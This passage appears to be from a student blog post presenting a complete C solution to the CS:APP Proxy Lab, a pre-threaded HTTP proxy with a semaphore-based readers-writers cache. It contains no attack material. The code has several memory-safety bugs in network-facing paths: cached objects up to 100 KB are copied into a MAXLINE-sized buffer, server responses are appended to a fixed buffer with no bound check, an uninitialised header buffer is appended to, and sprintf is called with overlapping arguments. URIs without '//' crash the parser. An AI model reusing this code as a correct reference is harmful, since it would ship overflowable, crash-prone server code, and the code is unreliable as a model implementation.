A score of 93 out of 100! That's good enough for our (at least my own) target. As you can see, there are still space to improve utility but this requires much more deeper analysis into the trace files and smarter strategies to eliminate fragmentation.

Lab 8: Proxy Lab

In this lab, you're required to implement a simple proxy server that receives requests from clients and transmit them to the destination server. When the server sends back the response, your proxy transmits it back to the client.

I used pre-threading as it's simple to implement and achieves good efficiency. The entire lab can be done in the following steps:

Create threads, initialize them and wait for available items (client connections).
Use an infinite loop to listen for client connections and insert file descriptors to the queue.
For each connection, parse the uri, and check if it's already in the cache.
If it's not in the cache, extract the host, port and file path, build headers and open a new connection to the server. Keep reading the response from the server and writing to the client. Don't forget to cache the content.
If it's already in the cache, just read the content from the cache and write it back to the client.

I leveraged the first class read-write solution in the textbook. In this solution, readers have a higher priority than writers. Writing is allowed only when all readers finish their work.

#include <stdio.h>
#include "csapp.h"

/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400
#define MAX_CACHE_BLK 10
#define NTHREADS 4
#define SBUFSIZE 16

static const char *user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char *connection_hdr = "Connection: close\r\n";
static const char *proxy_hdr = "Proxy-Connection: close\r\n";

typedef struct {
	char uri[MAXLINE];
	char buf[MAX_OBJECT_SIZE];
	int buf_size;
	int read_cnt;
	int stamp;
    sem_t mutex;
	sem_t write;
} cache_t;

cache_t caches[MAX_CACHE_BLK];

typedef struct {
	int *buf;
	int n;
	int front;
	int rear;
	sem_t mutex;
	sem_t slots;
	sem_t items;
} sbuf_t;

sbuf_t sbuf;

void doit (int fd);
void parse_uri (const char *uri, char *host, char *port, char *filename);
void build_headers (rio_t *rp, char *buf, char *method, char *filename, char *version, char *host);
void clienterror (int fd, char *cause, char *errnum, char *shortmsg, char *longmsg);

void sbuf_init (sbuf_t *sp, int n);
void sbuf_deinit (sbuf_t *sp);
void sbuf_insert (sbuf_t *sp, int item);
int  sbuf_remove (sbuf_t *sp);

void cache_init (cache_t *caches, int cache_cnt);
int  cache_read (cache_t *cache, char *buf);
void cache_write (cache_t *cache, char *uri, char *buf, int size);
int  cache_search (cache_t *caches, int cache_cnt, char *uri);
void cache_update (cache_t *caches, int cache_cnt, cache_t *cache);
int  cache_evict (cache_t *caches, int cache_cnt);
int  cache_latest (cache_t *caches, int cache_cnt);

void* thread(void *vargp);

int main (int argc, char **argv)
{
	int i, listenfd, connfd;
	char hostname[MAXLINE], port[MAXLINE];
	socklen_t clientlen;
	struct sockaddr_storage clientaddr;
	pthread_t tid[NTHREADS];

	if (argc != 2) {
		fprintf (stderr, "usage: %s <port>\n", argv[0]);
		exit (0);
	}
	
	listenfd = Open_listenfd (argv[1]);
	sbuf_init (&sbuf, SBUFSIZE);
	cache_init (caches, MAX_CACHE_BLK);
	for (i = 0; i < NTHREADS; i++)
		Pthread_create (&tid[i], NULL, thread, NULL);

	while (1) {
		clientlen = sizeof (clientaddr);
		connfd = Accept (listenfd, (SA *) &clientaddr, &clientlen);
		Getnameinfo((SA *) &clientaddr, clientlen, hostname, MAXLINE, port, MAXLINE, 0);
		printf ("Accepted connection from (%s, %s)\n", hostname, port);
		sbuf_insert (&sbuf, connfd);
	}

	sbuf_deinit (&sbuf);
}

void sbuf_init (sbuf_t *sp, int n)
{
	sp->buf = Calloc (n, sizeof (int));
	sp->n = n;
	sp->front = sp->rear = 0;
	Sem_init (&sp->mutex, 0, 1);
	Sem_init (&sp->slots, 0, n);
	Sem_init (&sp->items, 0, 0);
}

void sbuf_deinit (sbuf_t *sp)
{
	Free (sp->buf);
}

void sbuf_insert (sbuf_t *sp, int item)
{
	P (&sp->slots);
	P (&sp->mutex);
	sp->buf[(++sp->rear)%(sp->n)] = item;
	V (&sp->mutex);
	V (&sp->items);
}

int sbuf_remove (sbuf_t *sp)
{
	int item;
	P (&sp->items);
	P (&sp->mutex);
	item = sp->buf[(++sp->front)%(sp->n)];
	V (&sp->mutex);
	V (&sp->slots);
	return item;
}

void *thread (void* vargp)
{
	Pthread_detach (pthread_self());
	while (1) {
		int connfd = sbuf_remove (&sbuf);
		doit (connfd);
		Close (connfd);
	}
}

void doit (int fd) 
{
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    char host[MAXLINE], port[MAXLINE], filename[MAXLINE];
    rio_t rio, t_rio;
	int n_read;

    /* Read request line and headers */
    Rio_readinitb (&rio, fd);
    if (!Rio_readlineb (&rio, buf, MAXLINE)) 
        return;
    printf ("%s", buf);
    sscanf (buf, "%s %s %s", method, uri, version); 
    if (strcasecmp (method, "GET")) { 
        clienterror (fd, method, "501", "Not Implemented",
                    "Tiny does not implement this method");
        return;
    }
	if (!strcmp (version, "HTTP/1.1")) {
		strcpy (version, "HTTP/1.0");
	}

	int cache_idx = cache_search (caches, MAX_CACHE_BLK, uri);
	if (cache_idx == -1) {  // Cache not found
		parse_uri (uri, host, port, filename);
		build_headers (&rio, buf, method, filename, version, host);

		char t_buf[MAX_OBJECT_SIZE]; 
		*t_buf = '\0';
		int t_size = 0;

		int clientfd = Open_clientfd (host, port);
		Rio_readinitb (&t_rio, clientfd);
		Rio_writen (clientfd, buf, strlen (buf));
		while ((n_read = Rio_readlineb (&t_rio, buf, MAXLINE)) > 0) {
			Rio_writen (fd, buf, n_read);
			strcat (t_buf, buf);
			t_size += n_read;
		}
		if (t_size < MAX_OBJECT_SIZE) {
			int idx = cache_evict (caches, MAX_CACHE_BLK);
			cache_write (&caches[idx], uri, t_buf, t_size);
		}
		Close (clientfd);
	}
	else {  // Cache found
		int n_read = cache_read (&caches[cache_idx], buf);
		Rio_writen (fd, buf, n_read);
	}
}

void parse_uri (const char *uri, char *host, char *port, char *filename) 
{
    char *ptr;
	
	*host = '\0';
	*port = '\0';
	*filename = '\0';
	
	ptr = strstr (uri, "//");
	ptr += 2;
	char *p_filename = strstr (ptr, "/");
	char *p_port = strstr (ptr, ":");
	
	if (p_port) {
		if (p_filename) {
			size_t len = p_filename - p_port - 1;
			strncpy (port, p_port + 1, len);
			*(port + len) = '\0';
		} else {
			strcpy (port, p_port + 1);
		}
	} else {
		strcpy (port, "80");
	}

	if (p_filename) {
		strcpy (filename, p_filename);
	}

	if (p_port) {
		size_t len = p_port - ptr;
		strncpy (host, ptr, len);
		*(host + len) = '\0';
	} else if (p_filename) {
		size_t len = p_filename - ptr;
		strncpy (host, ptr, len);
		*(host + len) = '\0';
	} else {
		strcpy (host, ptr);
	}
}

void build_headers (rio_t *rp, char *buf, char *method, char *filename, char *version, char *hostname)
{
	char req[MAXLINE], host[MAXLINE], remaining[MAXLINE];
	char t_buf[MAXLINE];

	sprintf (req, "GET %s HTTP/1.0\r\n", filename);
	sprintf (host, "HOST: %s\r\n", hostname);

	Rio_readlineb (rp, t_buf, MAXLINE);
	while (strcmp (t_buf, "\r\n")) {
		if (!strncasecmp (t_buf, "HOST", 4)) {
			strcpy (host, t_buf);
		} else {
			strcat (remaining, t_buf);
		}
		Rio_readlineb (rp, t_buf, MAXLINE);
	}

	sprintf (buf, "%s", req);
	sprintf (buf, "%s%s", buf, host);
	sprintf (buf, "%s%s", buf, user_agent_hdr);
	sprintf (buf, "%s%s", buf, connection_hdr);
	sprintf (buf, "%s%s", buf, proxy_hdr);
	sprintf (buf, "%s%s", buf, remaining);
	sprintf (buf, "%s\r\n", buf);
}

void cache_init (cache_t *caches, int cache_cnt)
{
	for (int i = 0; i < cache_cnt; ++i) {
		caches[i].buf_size = 0;
		caches[i].read_cnt = 0;
		caches[i].stamp    = 0;
		Sem_init (&caches[i].mutex, 0, 1);
		Sem_init (&caches[i].write, 0, 1);
	}
}

int cache_read (cache_t *cache, char *buf) 
{
	P (&cache->mutex);
	cache->read_cnt++;
	if (cache->read_cnt == 1)
		P (&cache->write);
	V (&cache->mutex);

	strncpy (buf, cache->buf, cache->buf_size);
	cache_update (caches, MAX_CACHE_BLK, cache);

	P (&cache->mutex);
	cache->read_cnt--;
	if (cache->read_cnt == 0)
		V (&cache->write);
	V (&cache->mutex);

	return cache->buf_size;
}

void cache_write (cache_t *cache, char *uri, char *buf, int size)
{
	P (&cache->write);
	strcpy (cache->uri, uri);
	strcpy (cache->buf, buf);
	cache->buf_size = size;
	cache_update (caches, MAX_CACHE_BLK, cache);
	V (&cache->write);
}

int cache_latest (cache_t *caches, int cache_cnt)
{
	int latest = 0;
	for (int i = 0; i < cache_cnt; ++i) {
		if (caches[i].stamp < latest) 
			latest = caches[i].stamp;
	}
	return latest;
}

int cache_search (cache_t *caches, int cache_cnt, char *uri)
{
	for (int i = 0; i < cache_cnt; ++i)
		if (!strcmp (caches[i].uri, uri))
			return i;
	return -1;
}

void cache_update (cache_t *caches, int cache_cnt, cache_t *cache)
{
	cache->stamp = cache_latest (caches, cache_cnt) - 1;
}

int cache_evict (cache_t *caches, int cache_cnt)
{
	int least_stamp = caches[0].stamp;
	int least_idx = 0;
	for (int i = 0; i < cache_cnt; ++i) {
		if (caches[i].stamp == 0) {
			return i;
		}
		if (caches[i].stamp > least_stamp) {
			least_stamp = caches[i].stamp;
			least_idx = i;
		}
	}
	return least_idx;
}

void clienterror(int fd, char *cause, char *errnum, char *shortmsg, char *longmsg) 
{
    char buf[MAXLINE];

    /* Print the HTTP response headers */
    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n\r\n");
    Rio_writen(fd, buf, strlen(buf));

    /* Print the HTTP response body */
    sprintf(buf, "<html><title>Tiny Error</title>");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<body bgcolor=""ffffff"">\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "%s: %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<p>%s: %s\r\n", longmsg, cause);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<hr><em>The Tiny Web server</em>\r\n");
    Rio_writen(fd, buf, strlen(buf));
}